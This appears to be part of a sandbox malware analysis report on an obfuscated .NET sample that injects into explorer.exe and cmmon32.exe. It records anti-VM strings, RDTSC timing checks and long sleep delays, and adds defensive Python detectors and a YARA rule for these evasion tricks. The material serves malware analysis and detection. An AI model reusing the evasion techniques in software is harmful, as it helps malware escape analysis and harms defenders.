                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF27FA pushad ; ret 11_2_00FF27F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010209AD push ecx; mov dword ptr [esp], ecx11_2_010209B6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF283D push eax; iretd 11_2_00FF2858
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF1368 push eax; iretd 11_2_00FF1369
                Source: C:\Windows\explorer.exeCode function: 12_2_086A1B02 push esp; retn 0000h12_2_086A1B03
                Source: C:\Windows\explorer.exeCode function: 12_2_086A1B1E push esp; retn 0000h12_2_086A1B1F
                Source: C:\Windows\explorer.exeCode function: 12_2_086A19B5 push esp; retn 0000h12_2_086A1AE7
                Source: C:\Windows\explorer.exeCode function: 12_2_0E829B02 push esp; retn 0000h12_2_0E829B03
                Source: C:\Windows\explorer.exeCode function: 12_2_0E829B1E push esp; retn 0000h12_2_0E829B1F
                Source: C:\Windows\explorer.exeCode function: 12_2_0E8299B5 push esp; retn 0000h12_2_0E829AE7
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_003374CD push ecx; ret 14_2_003374E0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BC27FA pushad ; ret 14_2_04BC27F9
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BC225F pushad ; ret 14_2_04BC27F9
                Source: xU0wdBC6XWRZ6UY.exeStatic PE information: section name: .text entropy: 7.7959310845493555
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, lNjw1JhxSV5n0cCMNW.csHigh entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, NkEtj4xdihRGcDPjVY.csHigh entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, dPuWinwePpjqqHCFns.csHigh entropy of concatenated method names: 'nBfHADDSAI', 'AmJH64qstS', 'SQwHf5hrMv', 'YIaHUaOloU', 'k7QHlck4uQ', 'EN6H3Rko3p', 'zN2HPbHiGR', 'DajHjwyZ4t', 'VGCHKyav9U', 'hVAHcLZiaf'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, lW3SEhoCjxc3qX4lK2.csHigh entropy of concatenated method names: 'wHtEXjHJam', 'y6IEHkNyHZ', 'n9ME03dFKp', 'QtC0Cj0G5y', 'YUi0zmhL1u', 'v15EvDgxFC', 'MMBEumV4bC', 'zlZEb95mdt', 'UrQEJuxJPh', 'IR6EsyZP9J'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, sbKfnxHNobSaZlhNhl.csHigh entropy of concatenated method names: 'Dispose', 'iUVuB0ZpEL', 'nWPbSJPUh2', 'tMR22EP1rq', 'p9kuCvyVVY', 'tFOuzvd7ZD', 'ProcessDialogKey', 'GXcbvHf4qu', 'lpRbuAqjv3', 'Bhbbbuj3rA'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, Y7Z3Za75nAENBArWoe.csHigh entropy of concatenated method names: 'NScKuuNxlR', 'lorKJ3VT3V', 'Y7FKsYdV3S', 'Nn0KXp3eF5', 'd2KKrdE7sQ', 'CKsKt0HcvB', 'TeEK012qtu', 'LRMjntneoR', 'vd3jWdxehg', 'PThjB7fu8T'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, vCEtuTzYHk8gOdpdHF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmwKoBg5d0', 'NCMKlEQniU', 'xHUK3B5m4q', 'KdbKPxu3Ls', 'vfYKjv3ffo', 'RQnKK4xmLr', 'fkyKcsYruO'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, bffp9nNKfTCRJAQNXB.csHigh entropy of concatenated method names: 'nMVjXrgxi2', 'EuQjrppesQ', 'nvNjH0D42i', 'R27jtlWbTo', 'jahj0yuAJm', 'l8AjEMXiK8', 'ue7jdtrQu5', 'lMAjOAGEO3', 'e1fjDfqBq9', 'fDqjZ0HgJR'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, pCr6knlaScprUidGV1.csHigh entropy of concatenated method names: 'Pv2tiURTaZ', 'qyLtyHBxCp', 'yhMHxQIRfk', 'Du2HYMni24', 'MhiH9ktvjA', 'vOyHGQQtwC', 'dbAHen48dZ', 'yOOHNb8Eg2', 'WskHIc3t64', 'BNvH7T1HOC'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, QB6ppyRQvOmaM408Rf.csHigh entropy of concatenated method names: 'ToString', 'X7P3gRBuSa', 'pbM3SJJ7W3', 'mkI3x66e3o', 'nUM3YeGgaZ', 'kCL397aWM5', 'PlE3GgjFuU', 'Wbb3e8LPiX', 'ocY3NwEDwe', 'Rs33IxU1yL'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, iAPx3FWsia37RsC3kA.csHigh entropy of concatenated method names: 'XwfuEORRT4', 'PxSudAPmoQ', 'aIeuDKNap8', 'QNyuZZlnaW', 'mhFulqYNP0', 'ifWu3spGU9', 'rx6AQ0PjIkVkF2IBUx', 'fdhrqYTpnMoYLYWW0h', 'NkfuucMZ4Z', 'pQhuJvPFVr'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, SgKFaGS2a4JTTirWdE.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'w6QbBHwOFc', 'z7jbCHtGl6', 'hCtbz5Lc10', 'W1cJvluG7m', 'Bv3JuVeBQU', 'IVfJbajNFk', 'C9xJJPS4Uy', 'q21dEBju9jmVlRxjnyj'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, n2fTfG8U6T2RgZ194b.csHigh entropy of concatenated method names: 'sHIERGeHDq', 'fp0ET6ejo2', 'McLEFE0Nuc', 'K0YEAIFObV', 'wf2EiY5JTE', 'w4IE6PBlTc', 'jE7Eyh6Z2p', 'oa6Ef2Goo9', 'BVUEUb7vHl', 'VUFEVldlHB'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, vdRecDLWgIysvw14AQ.csHigh entropy of concatenated method names: 'zWCPDR9B8o', 'E8fPZYyy5J', 'ToString', 'Op5PXZ4lvD', 'pmMPrrEQ4P', 'aebPHRlggy', 'a3cPtRVRm7', 'x9SP0OBgDR', 'LZkPE6fArq', 'bg1PdyMgGr'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, FMM21NApj7mkQgReR42.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L67ckYdPKL', 'mgacwqJboA', 'FLQc1J4WAk', 'BXOcaaUHAG', 'fpJc4hFaYS', 's7icLdiq0f', 'Q7VcnNdCoy'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, EYog2FvuV3pWUgICen.csHigh entropy of concatenated method names: 'YSO0Qc4brQ', 'oxD0rCx1Ak', 'yl20tKeng1', 'TDl0EeQwSg', 'W1x0dBWDgr', 'HK5t4HqVXK', 'al7tLOrmRk', 'NwytnHiSc8', 'BJvtWDo1AO', 'g28tB6uZyJ'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, BMr7Oeh4xf4rlMegaY.csHigh entropy of concatenated method names: 'VmirkPqR8P', 'Xl3rwpav5r', 'FFwr1RbeBs', 'ibbratpSoW', 'NoAr4NR3wY', 'zYCrL3ewH6', 'V3ArnvNOi0', 'tkDrW7lNBy', 'qlXrB2pvDX', 'eYOrCuWJCQ'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, YdFeQq9tHdqAswqADM.csHigh entropy of concatenated method names: 'KU4l7k5Jn4', 'reSlmGl57V', 'HvElkaDWYL', 'ByklwYu0Ls', 'cRrlSdS79P', 'x3RlxuLoSV', 'PBplYSFQTs', 'EDSl9VRDvS', 'nbQlGkOttE', 'IuRle3qD3T'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, E1M3iiERCnPP7Bm8X1.csHigh entropy of concatenated method names: 'iDeofTTCZ5', 'KhboUg2y5O', 'JGroqynYs2', 'AwpoS4H2DL', 'qfloYQrbxp', 'C41o9Fb59s', 'WhpoeP3CQr', 'roboNke413', 'ud7o71kso6', 'o3tog9SFiU'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KIEU43UyhBb4c8dFta.csHigh entropy of concatenated method names: 'UQEF5Gk1a', 'yHsA4M12V', 'B8o6kSO7e', 'd3hyNAyMo', 'nc6Usf2Yo', 'BXMVVYyMW', 'QN6ANmmX2bF5BcAUxS', 'V29V1OZAOaf22RE6Ts', 'AHWji6m7L', 'MgqcYDiZG'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, rFjhCiAGQph79Ypq2eY.csHigh entropy of concatenated method names: 'qdQKRqGXE7', 'MB0KTnTyy3', 'ArOKFxhc1l', 'GZ6KALK3Y1', 'NtWKiaQij0', 'M9nK6EVSGa', 'QJXKyv8TY7', 'oOeKf1v82W', 'peDKUP4ejg', 'o9QKV2ucO9'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, KZZXqcc8tiXrQFatx7.csHigh entropy of concatenated method names: 'i2ZJQHnghv', 'QM7JXQEZvr', 'NMjJr0dWsk', 'PVRJHjgxmq', 'MmGJtF8PGT', 'ycSJ0FXmqy', 'Uc7JEoEf0E', 'u7fJddJYHJ', 'scRJOFxWC7', 'yMiJDVtOi4'
                Source: 3.2.xU0wdBC6XWRZ6UY.exe.4792bb0.2.raw.unpack, O5vIvyKmoj5ogVasPv.csHigh entropy of concatenated method names: 'FEkPWRB8vk', 'A6vPCil5Tl', 'NhOjvRYHhy', 'PGmjuHERtM', 'cxRPgVgXnH', 'rk2PmpTq54', 'iQdP5oHXLc', 'sKdPk4AtQY', 'NfePwbXWlT', 'myAP19FPDp'
Source: 3.2.xU0wdBC6XWRZ6UY.exe.9460000.6.raw.unpack and 3.2.xU0wdBC6XWRZ6UY.exe.4722990.1.raw.unpack (both dumps contain the same 21 classes with identical method-name sets; listed once below) | High entropy of concatenated method names:
  dPuWinwePpjqqHCFns.cs: 'nBfHADDSAI', 'AmJH64qstS', 'SQwHf5hrMv', 'YIaHUaOloU', 'k7QHlck4uQ', 'EN6H3Rko3p', 'zN2HPbHiGR', 'DajHjwyZ4t', 'VGCHKyav9U', 'hVAHcLZiaf'
  lW3SEhoCjxc3qX4lK2.cs: 'wHtEXjHJam', 'y6IEHkNyHZ', 'n9ME03dFKp', 'QtC0Cj0G5y', 'YUi0zmhL1u', 'v15EvDgxFC', 'MMBEumV4bC', 'zlZEb95mdt', 'UrQEJuxJPh', 'IR6EsyZP9J'
  sbKfnxHNobSaZlhNhl.cs: 'Dispose', 'iUVuB0ZpEL', 'nWPbSJPUh2', 'tMR22EP1rq', 'p9kuCvyVVY', 'tFOuzvd7ZD', 'ProcessDialogKey', 'GXcbvHf4qu', 'lpRbuAqjv3', 'Bhbbbuj3rA'
  Y7Z3Za75nAENBArWoe.cs: 'NScKuuNxlR', 'lorKJ3VT3V', 'Y7FKsYdV3S', 'Nn0KXp3eF5', 'd2KKrdE7sQ', 'CKsKt0HcvB', 'TeEK012qtu', 'LRMjntneoR', 'vd3jWdxehg', 'PThjB7fu8T'
  vCEtuTzYHk8gOdpdHF.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmwKoBg5d0', 'NCMKlEQniU', 'xHUK3B5m4q', 'KdbKPxu3Ls', 'vfYKjv3ffo', 'RQnKK4xmLr', 'fkyKcsYruO'
  bffp9nNKfTCRJAQNXB.cs: 'nMVjXrgxi2', 'EuQjrppesQ', 'nvNjH0D42i', 'R27jtlWbTo', 'jahj0yuAJm', 'l8AjEMXiK8', 'ue7jdtrQu5', 'lMAjOAGEO3', 'e1fjDfqBq9', 'fDqjZ0HgJR'
  pCr6knlaScprUidGV1.cs: 'Pv2tiURTaZ', 'qyLtyHBxCp', 'yhMHxQIRfk', 'Du2HYMni24', 'MhiH9ktvjA', 'vOyHGQQtwC', 'dbAHen48dZ', 'yOOHNb8Eg2', 'WskHIc3t64', 'BNvH7T1HOC'
  QB6ppyRQvOmaM408Rf.cs: 'ToString', 'X7P3gRBuSa', 'pbM3SJJ7W3', 'mkI3x66e3o', 'nUM3YeGgaZ', 'kCL397aWM5', 'PlE3GgjFuU', 'Wbb3e8LPiX', 'ocY3NwEDwe', 'Rs33IxU1yL'
  iAPx3FWsia37RsC3kA.cs: 'XwfuEORRT4', 'PxSudAPmoQ', 'aIeuDKNap8', 'QNyuZZlnaW', 'mhFulqYNP0', 'ifWu3spGU9', 'rx6AQ0PjIkVkF2IBUx', 'fdhrqYTpnMoYLYWW0h', 'NkfuucMZ4Z', 'pQhuJvPFVr'
  SgKFaGS2a4JTTirWdE.cs: 'EditValue', 'GetEditStyle', 'w6QbBHwOFc', 'z7jbCHtGl6', 'hCtbz5Lc10', 'W1cJvluG7m', 'Bv3JuVeBQU', 'IVfJbajNFk', 'C9xJJPS4Uy', 'q21dEBju9jmVlRxjnyj'
  n2fTfG8U6T2RgZ194b.cs: 'sHIERGeHDq', 'fp0ET6ejo2', 'McLEFE0Nuc', 'K0YEAIFObV', 'wf2EiY5JTE', 'w4IE6PBlTc', 'jE7Eyh6Z2p', 'oa6Ef2Goo9', 'BVUEUb7vHl', 'VUFEVldlHB'
  vdRecDLWgIysvw14AQ.cs: 'zWCPDR9B8o', 'E8fPZYyy5J', 'ToString', 'Op5PXZ4lvD', 'pmMPrrEQ4P', 'aebPHRlggy', 'a3cPtRVRm7', 'x9SP0OBgDR', 'LZkPE6fArq', 'bg1PdyMgGr'
  FMM21NApj7mkQgReR42.cs: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L67ckYdPKL', 'mgacwqJboA', 'FLQc1J4WAk', 'BXOcaaUHAG', 'fpJc4hFaYS', 's7icLdiq0f', 'Q7VcnNdCoy'
  EYog2FvuV3pWUgICen.cs: 'YSO0Qc4brQ', 'oxD0rCx1Ak', 'yl20tKeng1', 'TDl0EeQwSg', 'W1x0dBWDgr', 'HK5t4HqVXK', 'al7tLOrmRk', 'NwytnHiSc8', 'BJvtWDo1AO', 'g28tB6uZyJ'
  BMr7Oeh4xf4rlMegaY.cs: 'VmirkPqR8P', 'Xl3rwpav5r', 'FFwr1RbeBs', 'ibbratpSoW', 'NoAr4NR3wY', 'zYCrL3ewH6', 'V3ArnvNOi0', 'tkDrW7lNBy', 'qlXrB2pvDX', 'eYOrCuWJCQ'
  YdFeQq9tHdqAswqADM.cs: 'KU4l7k5Jn4', 'reSlmGl57V', 'HvElkaDWYL', 'ByklwYu0Ls', 'cRrlSdS79P', 'x3RlxuLoSV', 'PBplYSFQTs', 'EDSl9VRDvS', 'nbQlGkOttE', 'IuRle3qD3T'
  E1M3iiERCnPP7Bm8X1.cs: 'iDeofTTCZ5', 'KhboUg2y5O', 'JGroqynYs2', 'AwpoS4H2DL', 'qfloYQrbxp', 'C41o9Fb59s', 'WhpoeP3CQr', 'roboNke413', 'ud7o71kso6', 'o3tog9SFiU'
  KIEU43UyhBb4c8dFta.cs: 'UQEF5Gk1a', 'yHsA4M12V', 'B8o6kSO7e', 'd3hyNAyMo', 'nc6Usf2Yo', 'BXMVVYyMW', 'QN6ANmmX2bF5BcAUxS', 'V29V1OZAOaf22RE6Ts', 'AHWji6m7L', 'MgqcYDiZG'
  rFjhCiAGQph79Ypq2eY.cs: 'qdQKRqGXE7', 'MB0KTnTyy3', 'ArOKFxhc1l', 'GZ6KALK3Y1', 'NtWKiaQij0', 'M9nK6EVSGa', 'QJXKyv8TY7', 'oOeKf1v82W', 'peDKUP4ejg', 'o9QKV2ucO9'
  KZZXqcc8tiXrQFatx7.cs: 'i2ZJQHnghv', 'QM7JXQEZvr', 'NMjJr0dWsk', 'PVRJHjgxmq', 'MmGJtF8PGT', 'ycSJ0FXmqy', 'Uc7JEoEf0E', 'u7fJddJYHJ', 'scRJOFxWC7', 'yMiJDVtOi4'
  O5vIvyKmoj5ogVasPv.cs: 'FEkPWRB8vk', 'A6vPCil5Tl', 'NhOjvRYHhy', 'PGmjuHERtM', 'cxRPgVgXnH', 'rk2PmpTq54', 'iQdP5oHXLc', 'sKdPk4AtQY', 'NfePwbXWlT', 'myAP19FPDp'
Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, lNjw1JhxSV5n0cCMNW.cs | High entropy of concatenated method names: 'Kb0HWSL22O', 'RgtTUJcyZL', 'jHu2HrxObq', 'UAF22bihQq', 'Hla2xZGvyo', 'XAB2tPq0q8', 'aeMUEk3AsB3Pt', 'xw8jvYcwb', 'eSADOWkF2', 'hfhQtMtDc'
Source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, NkEtj4xdihRGcDPjVY.cs | High entropy of concatenated method names: 'HVYMFtP2f', 'CuEekxjKf', 'WGqJ3oTFt', 'GCn1bRmSG', 'Kbtl1TeP0', 'Fy7hiDf8S', 'e5JqCGSck', 'C2SLkryPZ', 'ksT8NQvKO', 'zvqT1Z212'
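The entropy statistic behind the rows above can be reproduced offline. The following is an added example, not part of the Joe Sandbox report and not the sandbox's own implementation: it computes the Shannon entropy of the concatenated method names for two classes copied from the rows above, compares them against a constructed set of hand-written WinForms method names, and adds a second, assumed heuristic (the share of names that mix both cases with digits) that still catches a class like vCEtuTzYHk8gOdpdHF.cs, where a few framework overrides (CanConvertFrom, ConvertTo) dilute the entropy. The thresholds are assumptions, not the sandbox's.

```python
import math
from collections import Counter

# Method-name sets copied from the report's "High entropy of concatenated
# method names" rows: the fully renamed class YdFeQq9tHdqAswqADM.cs and the
# partially renamed TypeConverter subclass vCEtuTzYHk8gOdpdHF.cs.
OBFUSCATED = ['KU4l7k5Jn4', 'reSlmGl57V', 'HvElkaDWYL', 'ByklwYu0Ls', 'cRrlSdS79P',
              'x3RlxuLoSV', 'PBplYSFQTs', 'EDSl9VRDvS', 'nbQlGkOttE', 'IuRle3qD3T']
MIXED = ['CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KmwKoBg5d0', 'NCMKlEQniU',
         'xHUK3B5m4q', 'KdbKPxu3Ls', 'vfYKjv3ffo', 'RQnKK4xmLr', 'fkyKcsYruO']
# Constructed control set: names as a developer would write them in a WinForms class.
READABLE = ['InitializeComponent', 'Dispose', 'OnLoad', 'ButtonClick', 'UpdateStatus',
            'LoadSettings', 'SaveSettings', 'ShowError', 'ResetForm', 'ValidateInput']


def shannon_entropy(text: str) -> float:
    """Bits per character of `text` under its own empirical symbol distribution."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def method_name_entropy(names) -> float:
    """Entropy of the concatenated method names, the statistic the sandbox reports."""
    return shannon_entropy(''.join(names))


def looks_generated(name: str) -> bool:
    """Assumed second signal: renamer output packs upper case, lower case and digits
    into one short token, which hand-written CamelCase identifiers rarely do."""
    return (len(name) >= 9
            and any(ch.isdigit() for ch in name)
            and any(ch.isupper() for ch in name)
            and any(ch.islower() for ch in name))


def generated_share(names) -> float:
    """Fraction of the class's method names that look machine-generated."""
    return sum(looks_generated(n) for n in names) / len(names)


def assess(names, entropy_threshold: float = 4.8, share_threshold: float = 0.5) -> dict:
    """Combine both signals. Thresholds are assumptions chosen so that the report's
    renamed classes trip them and the readable control set does not."""
    ent = method_name_entropy(names)
    share = generated_share(names)
    return {
        'entropy': round(ent, 3),
        'generated_share': share,
        'suspicious': ent >= entropy_threshold or share >= share_threshold,
    }


if __name__ == '__main__':
    for label, names in (('obfuscated', OBFUSCATED), ('mixed', MIXED), ('readable', READABLE)):
        print(f'{label:10s} {assess(names)}')
```

The entropy of the renamed class lands above 5 bits per character against roughly 4.3 for the readable control set, which is why the sandbox can flag it from names alone; the second heuristic exists because inherited method names (Dispose, ToString, ConvertTo) survive renaming and pull the entropy down without making the class any less obfuscated.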
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Process information set: NOOPENFILEERRORBOX (47 occurrences)
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX (8 occurrences)
Source: C:\Windows\SysWOW64\cmmon32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match | File source: Process Memory Space: xU0wdBC6XWRZ6UY.exe PID: 1540, type: MEMORYSTR
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | API/Special instruction interceptor at addresses: 7FFB2CECD324, 7FFB2CED0774, 7FFB2CED0154, 7FFB2CECD8A4, 7FFB2CECDA44, 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\cmmon32.exe | API/Special instruction interceptor at addresses: 7FFB2CECD324, 7FFB2CED0774, 7FFB2CECD944, 7FFB2CECD504, 7FFB2CECD544, 7FFB2CECD1E4, 7FFB2CED0154, 7FFB2CECD8A4, 7FFB2CECDA44
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | RDTSC instruction interceptor: first address 409904, second address 40990A; instructions: 0x00 rdtsc; 0x02 xor ecx, ecx; 0x04 add ecx, eax; 0x06 rdtsc
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | RDTSC instruction interceptor: first address 409B6E, second address 409B74; instructions: 0x00 rdtsc; 0x02 xor ecx, ecx; 0x04 add ecx, eax; 0x06 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: first address 2C99904, second address 2C9990A; instructions: 0x00 rdtsc; 0x02 xor ecx, ecx; 0x04 add ecx, eax; 0x06 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe | RDTSC instruction interceptor: first address 2C99B6E, second address 2C99B74; instructions: 0x00 rdtsc; 0x02 xor ecx, ecx; 0x04 add ecx, eax; 0x06 rdtsc
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Memory allocated (memory reserve | memory write watch) at: 18F0000, 33E0000, 31C0000, 94E0000, A4E0000, A7E0000, B7E0000
Note: the .NET CLR garbage collector commonly reserves its heap segments with MEM_WRITE_WATCH as well, so for a managed sample such as this one write-watch allocations are a weak indicator on their own.
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Code function: 11_2_00409AA0 rdtsc
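The RDTSC rows above describe a classic timing check: read the timestamp counter, do a little arithmetic, read it again and compare the delta against what bare metal would produce. As an added example (not from the report or the sample), the Python below scans an image for two rdtsc reads within a short byte window, decodes the bytes between them against a table of the encodings the report lists (both common encodings of each instruction), and prints the addresses in the same first/second form. The sample image is constructed here: nop filler with the report's sequence placed so that, under an assumed base of 0x409000, it lands at 0x409904/0x40990A and 0x409B6E/0x409B74. The `yara_rule` helper emits an equivalent static rule.

```python
import re

# Encodings of the instructions the sandbox listed between the two rdtsc reads.
KNOWN = {
    b'\x0f\x31': 'rdtsc',
    b'\x33\xc9': 'xor ecx, ecx',
    b'\x31\xc9': 'xor ecx, ecx',
    b'\x03\xc8': 'add ecx, eax',
    b'\x01\xc1': 'add ecx, eax',
}


def find_rdtsc_pairs(image: bytes, base: int = 0, max_gap: int = 16):
    """Yield (first_va, second_va, gap_bytes) for every pair of rdtsc reads that are at
    most max_gap bytes apart. The lazy quantifier pairs each read with the nearest one."""
    pattern = re.compile(rb'\x0f\x31(.{0,%d}?)\x0f\x31' % max_gap, re.DOTALL)
    for m in pattern.finditer(image):
        yield base + m.start(), base + m.end() - 2, m.group(1)


def decode_gap(gap: bytes):
    """Greedy two-byte decode against KNOWN; anything else is reported as a raw byte."""
    out, i = [], 0
    while i < len(gap):
        chunk = gap[i:i + 2]
        if chunk in KNOWN:
            out.append(KNOWN[chunk])
            i += 2
        else:
            out.append('db 0x%02x' % gap[i])
            i += 1
    return out


def is_timing_check(gap: bytes) -> bool:
    """True when everything between the reads is a recognised arithmetic step, i.e. a
    delta measurement rather than two unrelated rdtsc uses that happen to be close."""
    return all(not m.startswith('db') for m in decode_gap(gap))


def scan(image: bytes, base: int = 0x409000):
    """Report hits in the sandbox's 'first address / second address' shape."""
    return [(hex(first), hex(second), is_timing_check(gap))
            for first, second, gap in find_rdtsc_pairs(image, base)]


def yara_rule(max_gap: int = 16) -> str:
    """Static equivalent of the scanner for bulk hunting over unpacked dumps."""
    return ('rule rdtsc_delta_check {\n'
            '  strings:\n'
            '    $pair = { 0F 31 [0-%d] 0F 31 }\n'
            '  condition:\n'
            '    $pair\n'
            '}' % max_gap)


def build_sample_image() -> bytes:
    """Constructed test image: nop filler with the report's sequence at the report's
    offsets relative to the assumed base (0x904 and 0xB6E), once per encoding variant."""
    img = bytearray(b'\x90' * 0x1000)
    img[0x904:0x90c] = b'\x0f\x31\x33\xc9\x03\xc8\x0f\x31'
    img[0xb6e:0xb76] = b'\x0f\x31\x31\xc9\x01\xc1\x0f\x31'
    return bytes(img)


if __name__ == '__main__':
    for first, second, is_check in scan(build_sample_image()):
        print(f'first address: {first}  second address: {second}  delta check: {is_check}')
    print(yara_rule())
```

The addresses in the report are six bytes apart, which is exactly rdtsc (2 bytes) plus the two 2-byte instructions between the reads, so the scanner reproduces the sandbox's numbers from the byte pattern alone. Under a hypervisor, rdtsc is often trapped or offset, which inflates the delta and is what the sample is measuring; the same pair pattern with a large gap (a loop between the reads) is the other common variant.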
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Thread delayed: delay time: 922337203685477, 240000, 239890, 239781, 239672, 239562, 239453, 239330, 239218, 239105, 239000, 238890, 238781, 238671, 238562, 238430, 238328, 238217, 238104, 237984, 237873, 237763, 922337203685477 (23 events)
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Window / User API: threadDelayed 656
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | Window / User API: threadDelayed 3315
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 5092
Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 4849
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 886
Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 865
Source: C:\Windows\SysWOW64\cmmon32.exe | Window / User API: threadDelayed 9729
Source: C:\Windows\explorer.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_12-13911)
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe | API coverage: 1.6 %
Source: C:\Windows\SysWOW64\cmmon32.exe | API coverage: 1.8 %
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 4852 | Thread sleep time (each compared against the -30000s threshold): -14757395258967632s, -240000s, -239890s, -239781s, -239672s, -239562s, -239453s, -239330s, -239218s, -239105s, -239000s, -238890s, -238781s, -238671s, -238562s, -238430s, -238328s, -238217s, -238104s, -237984s, -237873s, -237763s
Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe TID: 6808 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 1624 | Thread sleep time: -10184000s >= -30000s
Source: C:\Windows\explorer.exe TID: 1624 | Thread sleep time: -9698000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4872 | Thread sleep count: 242 > 30
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4872 | Thread sleep time: -484000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4872 | Thread sleep count: 9729 > 30
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 4872 | Thread sleep time: -19458000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe | Last function: Thread delayed (2 occurrences)
                Source: explorer.exe, 0000000C.00000000.1300394418.0000000000C74000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000I
                Source: explorer.exe, 0000000C.00000000.1306325777.0000000003249000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                Source: explorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3741055942.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
